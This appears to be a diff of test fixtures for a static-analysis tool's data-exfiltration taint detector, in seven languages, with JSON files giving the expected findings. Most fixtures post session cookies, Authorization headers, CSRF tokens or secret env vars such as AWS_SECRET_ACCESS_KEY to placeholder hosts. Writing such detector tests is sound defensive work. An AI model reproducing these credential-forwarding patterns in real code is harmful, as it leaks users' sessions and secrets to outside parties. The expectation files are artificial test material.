logic in `taint/backwards.rs::DemandState` round-trips bit 13
(DATA_EXFIL) identically to the SQL/CMD/SSRF caps the rest of the
demand-driven suite covers.
"""
import requests
from flask import request
# Reads the `session` cookie from the Flask request and sends it as the
# JSON body of a `requests.post` to a literal URL.
def forward_session():
    sid = request.cookies.get("session")
    requests.post("https://analytics.internal/track", json={"session": sid})  # literal URL, cookie-derived body

View file

@ -0,0 +1,16 @@
{
"required_findings": [
{ "id_prefix": "taint-data-exfiltration", "min_count": 1 }
],
"forbidden_findings": [],
"noise_budget": {
"max_total_findings": 4,
"max_high_findings": 2
},
"performance_expectations": {
"max_ms_no_index": 1500,
"max_ms_index_cold": 2000,
"max_ms_index_warm": 800,
"ci_mode": "lenient"
}
}

View file

@ -0,0 +1,19 @@
// DATA_EXFIL fixture: a fixed destination URL and a Sensitive (cookie)
// source flowing into the outbound body of `http.Post`. SSRF must NOT
// fire (URL is hardcoded, position 0) but `Cap::DATA_EXFIL` must fire on
// the body (position 2) — the auth cookie is exactly the cross-boundary
// state DATA_EXFIL targets.
//
// Driven by `data_exfil_go_integration_tests.rs`.
package fixture
import (
"net/http"
"strings"
)
// leakCookie posts the value of the request's `session` cookie as the
// body of an http.Post to a literal URL.
func leakCookie(r *http.Request) {
	c, _ := r.Cookie("session") // lookup error is discarded
	body := strings.NewReader(c.Value)
	http.Post("https://analytics.internal/track", "text/plain", body) // literal URL (arg 0), cookie-derived body (arg 2)
}

View file

@ -0,0 +1,27 @@
// Container-taint DATA_EXFIL: a `url.Values` map (`map[string][]string`)
// is populated with Sensitive cookie values across two keys, then
// shipped as the form body of an outbound `http.PostForm`. The Go SSA heap
// model marks the map's `Elements` slot tainted on every `form[k] =
// ...` write; the sink-side `collect_tainted_sink_values` heap-loads
// the same slot when checking the form-data argument, so DATA_EXFIL
// must fire on the body channel even though the local map name itself
// is not directly tainted by an Assign. Pairs with
// `data_exfil_post_form.go` (single-write `url.Values` literal — no
// container-mutation step).
//
// Driven by `data_exfil_go_integration_tests.rs::map_assign_data_exfil`.
package fixture
import (
"net/http"
"net/url"
)
// leakSessionMap stores two cookie values under separate keys of a
// url.Values map and sends the map with http.PostForm to a literal URL.
func leakSessionMap(r *http.Request) {
	c, _ := r.Cookie("session") // lookup errors are discarded
	a, _ := r.Cookie("auth")
	form := url.Values{} // starts empty; filled by the index writes below
	form["session"] = []string{c.Value}
	form["auth"] = []string{a.Value}
	http.PostForm("https://analytics.internal/track", form) // literal URL, cookie-derived form data
}

View file

@ -0,0 +1,24 @@
// DATA_EXFIL fixture for the two-step `http.NewRequest` → `client.Do`
// idiom. `http.NewRequest` is modeled as a body propagator (default
// arg → return propagation lifts body taint onto the returned
// `*http.Request`); the outbound network call happens at
// `http.DefaultClient.Do`, where the DATA_EXFIL gate fires on the
// request argument.
//
// SSRF must NOT fire (URL is hardcoded at NewRequest's URL position) and
// the cookie-derived body must surface DATA_EXFIL at the Do call.
//
// Driven by `data_exfil_go_integration_tests.rs`.
package fixture
import (
"net/http"
"strings"
)
// leakViaNewRequest builds a POST request whose body is the `session`
// cookie value and sends it with http.DefaultClient.Do; the URL is a
// string literal.
func leakViaNewRequest(r *http.Request) {
	c, _ := r.Cookie("session") // lookup error is discarded
	body := strings.NewReader(c.Value)
	req, _ := http.NewRequest("POST", "https://analytics.internal/track", body) // construction error is discarded
	http.DefaultClient.Do(req) // the network call; response and error are discarded
}

View file

@ -0,0 +1,18 @@
// DATA_EXFIL fixture: a Sensitive (header) source flowing into the form
// payload of `http.PostForm` (arg 1, `url.Values`). The destination URL
// is hardcoded so SSRF does not fire; only the form-data path activates
// the body-position gate.
//
// Driven by `data_exfil_go_integration_tests.rs`.
package fixture
import (
"net/http"
"net/url"
)
// leakAuthHeader places the request's Authorization header value in a
// url.Values literal and sends it with http.PostForm to a literal URL.
func leakAuthHeader(r *http.Request) {
	auth := r.Header.Get("Authorization")
	form := url.Values{"token": []string{auth}} // single-write literal, no later mutation
	http.PostForm("https://analytics.internal/track", form) // literal URL, header-derived form data
}

View file

@ -0,0 +1,19 @@
// DATA_EXFIL silenced regression fixture: plain user input echoed into
// the body of an outbound `http.Post` to a fixed URL must NOT fire
// `Cap::DATA_EXFIL`. The user already controls `r.FormValue("msg")`, so
// surfacing it back into the request payload is not a cross-boundary
// disclosure. Source-sensitivity gating in `ast.rs` strips the cap.
//
// Driven by `data_exfil_go_integration_tests.rs`.
package fixture
import (
"net/http"
"strings"
)
// forwardUserInput posts the `msg` form value as the body of an
// http.Post to a literal URL.
func forwardUserInput(r *http.Request) {
	msg := r.FormValue("msg") // plain request input, not a cookie or header
	body := strings.NewReader(msg)
	http.Post("https://analytics.internal/track", "text/plain", body) // literal URL, user-supplied body
}

18
tests/fixtures/go/ssrf_url_tainted.go vendored Normal file
View file

@ -0,0 +1,18 @@
// SSRF regression fixture: attacker-controlled destination URL flows
// into `http.NewRequest`'s URL position (arg 1). SSRF must fire on the
// URL flow; DATA_EXFIL must NOT fire (the body is hardcoded `nil`).
// Cap attribution is per-position so a tainted URL never surfaces as
// data exfiltration.
//
// Driven by `data_exfil_go_integration_tests.rs`.
package fixture
import (
"net/http"
)
// proxy builds a GET request to the URL given in the `target` query
// parameter, with a nil body, and sends it with http.DefaultClient.Do.
func proxy(r *http.Request) {
	target := r.URL.Query().Get("target") // request-controlled destination
	req, _ := http.NewRequest("GET", target, nil) // URL is arg 1; body is nil; error is discarded
	http.DefaultClient.Do(req)
}

View file

@ -0,0 +1,27 @@
// DATA_EXFIL fixture: Apache HttpClient. A request cookie (Sensitive)
// is wrapped in a StringEntity (default smear) and attached to an
// HttpPost via setEntity (also default smear). The network call
// happens at `httpClient.execute(req)`, which type-qualified resolution
// rewrites to `HttpClient.execute` via JAVA_HIERARCHY
// (CloseableHttpClient subtypes HttpClient). SSRF must NOT fire (URL
// is a hardcoded constant on the HttpPost ctor).
//
// Driven by `data_exfil_java_integration_tests.rs`.
import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletRequest;
import org.apache.http.HttpResponse;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.entity.StringEntity;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
// Fixture class: sends the value of the first request cookie as the
// entity of an Apache HttpPost to a literal URL.
public class DataExfilApacheHttpClient {
    public void leak(HttpServletRequest request) throws Exception {
        Cookie[] cookies = request.getCookies();
        String session = cookies[0].getValue(); // first cookie only; no null/length check
        CloseableHttpClient httpClient = HttpClients.createDefault();
        HttpPost req = new HttpPost("https://analytics.internal/track"); // literal URL
        req.setEntity(new StringEntity(session)); // cookie value becomes the request entity
        HttpResponse resp = httpClient.execute(req); // the network call; resp is unused
    }
}

View file

@ -0,0 +1,28 @@
// DATA_EXFIL fixture: java.net.http chain. A Sensitive source (cookie)
// flows through `BodyPublishers.ofString(payload)` and the request
// builder chain into `client.send(req)` at a hardcoded URL. SSRF must
// NOT fire (URL is a fixed string) and `Cap::DATA_EXFIL` must fire
// because the cookie is exactly the cross-boundary state the cap
// targets.
//
// Driven by `data_exfil_java_integration_tests.rs`.
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpRequest.BodyPublishers;
import java.net.http.HttpResponse.BodyHandlers;
import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletRequest;
// Fixture class: sends the value of the first request cookie as the POST
// body of a java.net.http request to a literal URL.
public class DataExfilJdkHttpClient {
    public void leak(HttpServletRequest request) throws Exception {
        Cookie[] cookies = request.getCookies();
        String session = cookies[0].getValue(); // first cookie only; no null/length check
        HttpClient client = HttpClient.newHttpClient();
        HttpRequest req = HttpRequest.newBuilder()
            .uri(URI.create("https://analytics.internal/track")) // literal URL
            .POST(BodyPublishers.ofString(session)) // cookie value becomes the body
            .build();
        client.send(req, BodyHandlers.ofString()); // the network call; response is discarded
    }
}

View file

@ -0,0 +1,28 @@
// DATA_EXFIL fixture: OkHttp two-step. A session attribute (Sensitive)
// is wrapped via `RequestBody.create` (default arg → return smear)
// and bound to the request via the builder chain. The network call
// happens at `client.newCall(req).execute()` which hits the
// chain-normalized `newCall.execute` matcher. SSRF must NOT fire on
// the hardcoded URL.
//
// Driven by `data_exfil_java_integration_tests.rs`.
import javax.servlet.http.HttpSession;
import okhttp3.MediaType;
import okhttp3.OkHttpClient;
import okhttp3.Request;
import okhttp3.RequestBody;
import okhttp3.Response;
// Fixture class: sends the `csrfToken` session attribute as the POST body
// of an OkHttp request to a literal URL.
public class DataExfilOkHttp {
    public void leak(HttpSession session) throws Exception {
        String token = (String) session.getAttribute("csrfToken");
        OkHttpClient client = new OkHttpClient();
        RequestBody body = RequestBody.create(
            token, MediaType.parse("text/plain")); // session attribute becomes the body
        Request req = new Request.Builder()
            .url("https://analytics.internal/track") // literal URL
            .post(body)
            .build();
        Response resp = client.newCall(req).execute(); // the network call; resp is unused
    }
}

View file

@ -0,0 +1,23 @@
// DATA_EXFIL fixture: Spring RestTemplate. An HTTP header value (a
// Sensitive source) flows directly into the request body of
// `restTemplate.postForObject(url, body, type)`. The destination URL
// is hardcoded so SSRF must NOT fire. `Cap::DATA_EXFIL` must fire on
// the body position. Type-qualified resolution rewrites
// `restTemplate.postForObject` → `HttpClient.postForObject` via the
// JAVA_HIERARCHY (RestTemplate subtypes HttpClient), reusing the same
// flat sink rule the JDK client uses.
//
// Driven by `data_exfil_java_integration_tests.rs`.
import javax.servlet.http.HttpServletRequest;
import org.springframework.web.client.RestTemplate;
// Fixture class: passes the Authorization header value as the body
// argument of RestTemplate.postForObject with a literal URL.
public class DataExfilRestTemplate {
    public void leak(HttpServletRequest request) {
        String authHeader = request.getHeader("Authorization");
        RestTemplate restTemplate = new RestTemplate();
        // Arguments: literal URL, header-derived body, response type.
        // The return value is discarded.
        restTemplate.postForObject(
            "https://analytics.internal/track",
            authHeader,
            String.class);
    }
}

View file

@ -0,0 +1,20 @@
// DATA_EXFIL fixture: Spring WebClient. A Sensitive source (env var)
// flows through `.bodyValue(payload)` on a fixed-URL chain. SSRF must
// NOT fire (URL is hardcoded) and `Cap::DATA_EXFIL` must fire at the
// body-binding step, since the bare-name `bodyValue` matcher hits
// independent of receiver type.
//
// Driven by `data_exfil_java_integration_tests.rs`.
import org.springframework.web.reactive.function.client.WebClient;
// Fixture class: passes the AWS_SECRET_ACCESS_KEY environment variable to
// `bodyValue` on a WebClient POST chain with a literal URL.
public class DataExfilWebClient {
    public void leak() {
        String secret = System.getenv("AWS_SECRET_ACCESS_KEY");
        WebClient webClient = WebClient.create();
        // The result of the chain is not stored or used.
        webClient.post()
            .uri("https://analytics.internal/track") // literal URL
            .bodyValue(secret) // env var value bound as the body
            .retrieve()
            .bodyToMono(String.class);
    }
}

View file

@ -0,0 +1,25 @@
// Regression fixture: a tainted URL flowing into HttpClient.send must
// fire SSRF (taint-unsanitised-flow) but must NOT fire DATA_EXFIL.
// The body is a hardcoded literal so no Sensitive payload reaches the
// outbound request. This guards against over-firing DATA_EXFIL on
// flows where only the URL position is attacker-controlled.
//
// Driven by `data_exfil_java_integration_tests.rs`.
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpRequest.BodyPublishers;
import java.net.http.HttpResponse.BodyHandlers;
import javax.servlet.http.HttpServletRequest;
public class SsrfUrlOnlyNoDataExfil {
public void doGet(HttpServletRequest request) throws Exception {
String target = request.getParameter("url");
HttpClient client = HttpClient.newHttpClient();
HttpRequest req = HttpRequest.newBuilder()
.uri(URI.create(target))
.POST(BodyPublishers.ofString("ping"))
.build();
client.send(req, BodyHandlers.ofString());
}
}

View file

@ -1,11 +1,15 @@
// DATA_EXFIL fixture: a fixed destination URL and an attacker-influenced
// body. SSRF must NOT fire (destination is hardcoded) but `Cap::DATA_EXFIL`
// must fire on the body field — request-bound bytes are leaving the process
// via the outbound request payload.
// DATA_EXFIL fixture: a fixed destination URL and a sensitive (cookie /
// session) source flowing into the outbound body. SSRF must NOT fire
// (destination is hardcoded) but `Cap::DATA_EXFIL` must fire because the
// source is Sensitive (`req.cookies.session` carries auth material) — exactly
// the cross-boundary leak the cap targets.
//
// Plain user input echoed back into a body is intentionally not classified
// as data exfiltration; see `fetch_body_user_input_silenced.js`.
//
// Driven by `fetch_data_exfil_integration_tests.rs`.
function leakBody(req) {
var payload = req.body.message;
var payload = req.cookies.session;
fetch('/endpoint', {
method: 'POST',
body: payload,

View file

@ -0,0 +1,19 @@
// DATA_EXFIL type-suppression fixture: a Sensitive cookie source coerced
// to an integer via `parseInt(...)` is NOT a credential payload; the
// resulting numeric body cannot encode a session token, header secret, or
// other exfiltratable material. The type-aware sink suppression in
// `is_type_safe_for_sink` (see `src/ssa/type_facts.rs`) recognises the
// proven-`Int` SSA value at the gate and silences the cap.
//
// Negative regression: without DATA_EXFIL in the type-suppressible mask
// this would over-fire on every `fetch({ body: parseInt(req.cookies.x) })`
// pattern (e.g. analytics ingestion of session counters).
//
// Driven by `fetch_data_exfil_integration_tests.rs`.
function reportSessionCount(req) {
var count = parseInt(req.cookies.session_count, 10);
fetch('/metrics', {
method: 'POST',
body: count,
});
}

View file

@ -0,0 +1,15 @@
// DATA_EXFIL silenced regression fixture: plain user input echoed into the
// body of an outbound `fetch` to a fixed URL must NOT fire `Cap::DATA_EXFIL`.
// The user already controls `req.body.message` — surfacing it back into the
// request payload is not a cross-boundary disclosure. This is the canonical
// false-positive class for API gateways and telemetry forwarders that proxy
// `req.body`, killed by the source-sensitivity gate in `ast.rs`.
//
// Driven by `fetch_data_exfil_integration_tests.rs`.
function forward(req) {
var payload = req.body.message;
fetch('/endpoint', {
method: 'POST',
body: payload,
});
}

View file

@ -0,0 +1,17 @@
// DATA_EXFIL allowlist-suppression fixture.
//
// The destination URL has a static prefix (`https://api.internal/...`) that
// the test harness installs as a trusted destination via
// [detectors.data_exfil.trusted_destinations]. The body still carries a
// Sensitive source (`req.cookies.session`), but routing it through a known-
// trusted upstream is a *legitimate* forwarding pipeline: the cap is
// suppressed for this filter only.
//
// Driven by `fetch_data_exfil_suppression_tests.rs`.
function leakBody(req) {
var payload = req.cookies.session;
fetch('https://api.internal/forward', {
method: 'POST',
body: payload,
});
}

View file

@ -0,0 +1,15 @@
// DATA_EXFIL allowlist-NEGATIVE fixture.
//
// The destination URL prefix (`https://untrusted.example.com/`) is NOT
// covered by the harness-installed
// [detectors.data_exfil.trusted_destinations] entries, so the cap MUST
// still fire on a Sensitive source flowing into the body.
//
// Driven by `fetch_data_exfil_suppression_tests.rs`.
function leakBodyExternal(req) {
var payload = req.cookies.session;
fetch('https://untrusted.example.com/intake', {
method: 'POST',
body: payload,
});
}

View file

@ -0,0 +1,13 @@
// DATA_EXFIL sanitizer-convention fixture.
//
// `logEvent({user: req.cookies.session})` routes a Sensitive cookie source
// through a named telemetry boundary. The forwarding-wrapper convention
// (see docs/detectors/taint.md) treats `logEvent` as a default
// `Sanitizer(Cap::DATA_EXFIL)` so the cap does NOT fire on this call.
//
// Driven by `fetch_data_exfil_suppression_tests.rs`.
function track(req) {
logEvent({
user: req.cookies.session,
});
}

View file

@ -0,0 +1,13 @@
#include <curl/curl.h>
#include <stdlib.h>
void leak_env() { /* positive case: the paired expectation requires taint-data-exfiltration to fire */
char *token = getenv("AUTH_TOKEN"); /* body source: value read from the environment */
if (!token) return; /* nothing to send when the variable is unset */
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_URL, "https://analytics.internal/track"); /* destination is a string literal */
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, token); /* body-binding call: env value becomes the POST body */
curl_easy_perform(curl);
curl_easy_cleanup(curl);
}

View file

@ -0,0 +1,13 @@
{
"description": "curl_easy_setopt(handle, CURLOPT_POSTFIELDS, body) gated sink: the activation arg (CURLOPT_POSTFIELDS) is matched as a preprocessor-macro identifier via the macro-arg fallback, so DATA_EXFIL fires only at the body-binding setopt call (not at the CURLOPT_URL setopt above it). getenv(\"AUTH_TOKEN\") is Sensitivity::Sensitive so DATA_EXFIL must fire.",
"tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "macro-activation"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [4, 12],
"notes": "getenv(\"AUTH_TOKEN\") → SourceKind::EnvironmentConfig → Sensitivity::Sensitive — DATA_EXFIL fires on the curl_easy_setopt body-binding call gated by CURLOPT_POSTFIELDS."
}
]
}

View file

@ -0,0 +1,13 @@
#include <curl/curl.h>
#include <stdio.h>
void forward_stdin() { /* negative case: the paired expectation requires taint-data-exfiltration NOT to fire */
char input[256];
if (!fgets(input, sizeof(input), stdin)) return; /* body source: one line read from stdin; bail out on EOF/error */
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_URL, "https://telemetry.internal/forward"); /* destination is a string literal */
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, input); /* body-binding call: stdin line becomes the POST body */
curl_easy_perform(curl);
curl_easy_cleanup(curl);
}

View file

@ -0,0 +1,13 @@
{
"description": "curl_easy_setopt CURLOPT_POSTFIELDS body-binding with a plain user-input source (fgets/stdin). DATA_EXFIL must NOT fire: the body source is Sensitivity::Plain (raw user input) and the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL. Pairs with data_exfil_curl_postfields.c to assert per-tier routing for C.",
"tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_not_match": true,
"line_range": [4, 12],
"notes": "Body source is plain user input (fgets from stdin → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources — plain user input echoed into a request body is not data exfiltration."
}
]
}

View file

@ -0,0 +1,13 @@
#include <curl/curl.h>
#include <cstdlib>
void leak_env() { // positive case: the paired expectation requires taint-data-exfiltration to fire
const char *token = std::getenv("AUTH_TOKEN"); // body source: value read from the environment
if (!token) return; // nothing to send when the variable is unset
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_URL, "https://analytics.internal/track"); // destination is a string literal
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, token); // body-binding call: env value becomes the POST body
curl_easy_perform(curl);
curl_easy_cleanup(curl);
}

View file

@ -0,0 +1,13 @@
{
"description": "curl_easy_setopt(handle, CURLOPT_POSTFIELDS, body) gated sink in C++: same gating model as the C fixture. The activation arg (CURLOPT_POSTFIELDS) is matched as a preprocessor-macro identifier via the macro-arg fallback, so DATA_EXFIL fires only at the body-binding setopt call. std::getenv is Sensitivity::Sensitive so DATA_EXFIL must fire.",
"tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "macro-activation"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [4, 12],
"notes": "std::getenv(\"AUTH_TOKEN\") → SourceKind::EnvironmentConfig → Sensitivity::Sensitive — DATA_EXFIL fires on the curl_easy_setopt body-binding call gated by CURLOPT_POSTFIELDS."
}
]
}

View file

@ -0,0 +1,13 @@
#include <curl/curl.h>
#include <cstdio>
void forward_stdin() { // negative case: the paired expectation requires taint-data-exfiltration NOT to fire
char input[256];
if (!fgets(input, sizeof(input), stdin)) return; // body source: one line read from stdin; bail out on EOF/error
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_URL, "https://telemetry.internal/forward"); // destination is a string literal
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, input); // body-binding call: stdin line becomes the POST body
curl_easy_perform(curl);
curl_easy_cleanup(curl);
}

View file

@ -0,0 +1,13 @@
{
"description": "curl_easy_setopt CURLOPT_POSTFIELDS body-binding with a plain user-input source (fgets from stdin). DATA_EXFIL must NOT fire: the body source is Sensitivity::Plain (raw user input) and the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL. Pairs with data_exfil_curl_postfields.cpp to assert per-tier routing for C++.",
"tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_not_match": true,
"line_range": [4, 12],
"notes": "Body source is plain user input (fgets from stdin → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources — plain user input echoed into a request body is not data exfiltration."
}
]
}

View file

@ -0,0 +1,19 @@
{
"description": "Container-taint DATA_EXFIL: tokens array pushed with req.cookies.session is JSON-stringified into a fetch body. The SSA heap Elements slot carries the cap from `tokens.push(...)` to the sink-side `collect_tainted_sink_values` heap-load, so DATA_EXFIL must fire on the body field even though `payload` itself is not directly tainted by an Assign.",
"tags": ["taint", "data-exfil", "fetch", "container", "heap-elements", "cookie", "edge-case"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [12, 17],
"notes": "tokens.push(req.cookies.session) → JSON.stringify({batch: tokens}) → fetch body. Heap Elements taint must round-trip through the container."
},
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [12, 17],
"notes": "fetch URL is a fixed literal — body taint must not surface as SSRF."
}
]
}

View file

@ -0,0 +1,21 @@
var express = require('express');
var app = express();
// Container-taint DATA_EXFIL: push a Sensitive cookie source into an
// array, then send the JSON-stringified batch as the outbound `fetch` body. The
// SSA heap model marks the array's `Elements` slot tainted at the
// `tokens.push(...)` write; the sink-side `collect_tainted_sink_values`
// loads the same slot and observes the cap, so DATA_EXFIL must fire on
// the body channel even though the body var (`payload`) is not directly
// tainted. Pairs with `array_push_taint.js` (same shape, different
// sink: XSS).
app.post('/batch', function(req, res) {
var tokens = [];
tokens.push(req.cookies.session);
var payload = JSON.stringify({ batch: tokens });
fetch('https://analytics.internal/track', {
method: 'POST',
body: payload,
});
res.status(204).end();
});

View file

@ -0,0 +1,19 @@
{
"description": "Async/await DATA_EXFIL parity: an `await fetch(URL, {body: ...})` call with a Sensitive cookie source must fire DATA_EXFIL on the body field (no SSRF — destination is a fixed literal). Awaits do not strip taint; the cap split is preserved across the await edge identically to the synchronous fetch path.",
"tags": ["taint", "data-exfil", "fetch", "async", "await", "cookie", "edge-case"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [13, 16],
"notes": "req.cookies.session → JSON.stringify into await fetch body. Await must not silence the cap."
},
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [13, 16],
"notes": "fetch URL is a fixed literal — body taint must not fire as SSRF."
}
]
}

View file

@ -0,0 +1,18 @@
var express = require('express');
var app = express();
// Async/await DATA_EXFIL: `await fetch(...)` must preserve the cap
// split. The destination URL is a fixed string literal (so SSRF must
// NOT fire) but a Sensitive cookie source threads through the body
// channel of the awaited call, so `Cap::DATA_EXFIL` MUST fire on the
// body field. Awaiting a Promise does not strip taint; the SSA lowering
// preserves chained await values across .then/.await edges identically
// to the synchronous fetch case.
app.post('/sync-async', async function (req, res) {
var sid = req.cookies.session;
await fetch('https://analytics.internal/track', {
method: 'POST',
body: JSON.stringify({ session: sid }),
});
res.status(204).end();
});

View file

@ -0,0 +1,13 @@
{
"description": "Constructor cap narrowing: env secret flowing through `new Stripe(key)` must not propagate FILE_IO into the wrapper, so SDK-method-returned property values written to a file do not flag a phantom path-traversal flow.",
"tags": ["taint", "file_io", "constructor", "sdk", "negative", "regression-fp"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [9, 16],
"notes": "process.env.STRIPE_SECRET_KEY → new Stripe(key) → stripe.prices.create() → price.id → fs.writeFileSync — wrapper-object construction strips FILE_IO."
}
]
}

View file

@ -0,0 +1,17 @@
// Constructor cap narrowing: a third-party SDK client constructed from an
// env-derived secret returns objects whose string properties are
// SDK-generated, not derived from the secret in any path-shaped sense.
// `Cap::all()` flowing through `new Stripe(key)` must drop FILE_IO so
// downstream `fs.writeFileSync` of an SDK property does not flag a phantom
// path-traversal flow.
var fs = require('fs');
var key = process.env.STRIPE_SECRET_KEY;
var stripe = new Stripe(key);
async function setup() {
var price = await stripe.prices.create({ unit_amount: 9599 });
var line = 'PRICE_ID="' + price.id + '"';
fs.writeFileSync('./out.env', line);
}
setup();

View file

@ -0,0 +1,19 @@
{
"description": "Session-id forwarder: req.cookies.session (Sensitive-tier source) flows into a fixed-URL fetch body. SSRF must NOT fire (destination is hardcoded), but Cap::DATA_EXFIL MUST fire — auth-bearing operator state is leaving the process via the outbound payload. Pairs with fetch_tainted_body_safe.js (Plain source, silenced) to assert the source-sensitivity gate routes per-tier rather than globally.",
"tags": ["taint", "data-exfil", "fetch", "sensitivity-gate", "cookie", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [10, 17],
"notes": "fetch URL is a fixed literal — body taint must not fire as SSRF."
},
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [10, 17],
"notes": "req.cookies.session → SourceKind::Cookie → Sensitivity::Sensitive — DATA_EXFIL fires on the body field."
}
]
}

View file

@ -0,0 +1,18 @@
var express = require('express');
var app = express();
// Session-id forwarder: an internal handler proxies the user's session
// cookie into the body of an outbound request to a fixed analytics URL.
// The destination is hardcoded so SSRF must NOT fire, but the source is
// Sensitive-tier (cookie carries auth material) so Cap::DATA_EXFIL MUST
// fire — operator-bound state is leaving the process via the request
// payload.
app.get('/sync', function(req, res) {
var sid = req.cookies.session;
fetch('https://analytics.internal/track', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ session: sid }),
});
res.status(204).end();
});

View file

@ -1,6 +1,6 @@
{
"description": "fetch() with a fixed destination URL and an attacker-controlled body. SSRF must NOT fire (destination is not attacker-influenced) and the cross-boundary data-exfiltration class (Cap::DATA_EXFIL) MUST fire on the body field.",
"tags": ["taint", "data-exfil", "fetch", "destination-aware", "cap-attribution"],
"description": "fetch() with a fixed destination URL and a plain user-input body (req.body.message). SSRF must NOT fire (destination is not attacker-influenced) and DATA_EXFIL must NOT fire either: plain user input echoed back via an outbound body is not a cross-boundary disclosure (the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL).",
"tags": ["taint", "data-exfil", "fetch", "destination-aware", "cap-attribution", "sensitivity-gate"],
"modes": ["full"],
"expected": [
{
@ -11,9 +11,9 @@
},
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"must_not_match": true,
"line_range": [7, 14],
"notes": "Body field carries req.body.message → must fire DATA_EXFIL (sensitive data leaving the process via outbound request payload)."
"notes": "Body source is plain user input (req.body.message → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources (cookies, headers, env, db, file) — plain user input echoed into a request body is not data exfiltration. See fetch_body_user_input_silenced.js for the unit-level regression."
}
]
}

View file

@ -0,0 +1,13 @@
{
"description": "curl_setopt($ch, CURLOPT_POSTFIELDS, $payload) gated sink: the activation arg (CURLOPT_POSTFIELDS) is matched as a define-style identifier via the macro-arg fallback, narrowing the gate so DATA_EXFIL fires only at the body-binding setopt call. The cookie source is Sensitivity::Sensitive so DATA_EXFIL must fire. The CURLOPT_RETURNTRANSFER setopt on the next line must NOT trigger the gate (different option, not a body slot).",
"tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "macro-activation"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [3, 10],
"notes": "$_COOKIE['auth_token'] → SourceKind::Cookie → Sensitivity::Sensitive — DATA_EXFIL fires on the curl_setopt body-binding call gated by CURLOPT_POSTFIELDS."
}
]
}

View file

@ -0,0 +1,10 @@
<?php
function leak_session() { // positive case: the paired expectation requires taint-data-exfiltration to fire
$token = $_COOKIE['auth_token']; // body source: cookie value
$ch = curl_init('https://analytics.internal/track'); // destination is a string literal
curl_setopt($ch, CURLOPT_POSTFIELDS, "session={$token}"); // body-binding call: cookie value interpolated into the POST body
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // different option, not a body slot; must not trigger the gate
curl_exec($ch);
curl_close($ch);
}

View file

@ -0,0 +1,13 @@
{
"description": "curl_setopt CURLOPT_POSTFIELDS body-binding with a plain user-input source ($_POST). DATA_EXFIL must NOT fire: the body source is Sensitivity::Plain and the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL. Pairs with data_exfil_curl_postfields.php to assert per-tier routing for PHP.",
"tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_not_match": true,
"line_range": [3, 9],
"notes": "Body source is plain user input ($_POST → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources — plain user input echoed into a request body is not data exfiltration."
}
]
}

View file

@ -0,0 +1,9 @@
<?php
function forward_message() { // negative case: the paired expectation requires taint-data-exfiltration NOT to fire
$msg = $_POST['message']; // body source: plain request form field
$ch = curl_init('https://telemetry.internal/forward'); // destination is a string literal
curl_setopt($ch, CURLOPT_POSTFIELDS, "message={$msg}"); // body-binding call: form value interpolated into the POST body
curl_exec($ch);
curl_close($ch);
}

View file

@ -0,0 +1,19 @@
{
"description": "Container-taint DATA_EXFIL: payload dict accumulates os.environ.get() secrets across multiple keys, then flows into requests.post(json=payload). The SSA heap Elements slot carries the cap from each `payload[k] = ...` store to the sink-side heap-load, so DATA_EXFIL must fire on the json field. Mirrors `array_push_data_exfil.js` / `map_assign_data_exfil.go` for cross-language container-taint coverage.",
"tags": ["taint", "data-exfil", "requests", "container", "heap-elements", "env", "edge-case"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [18, 22],
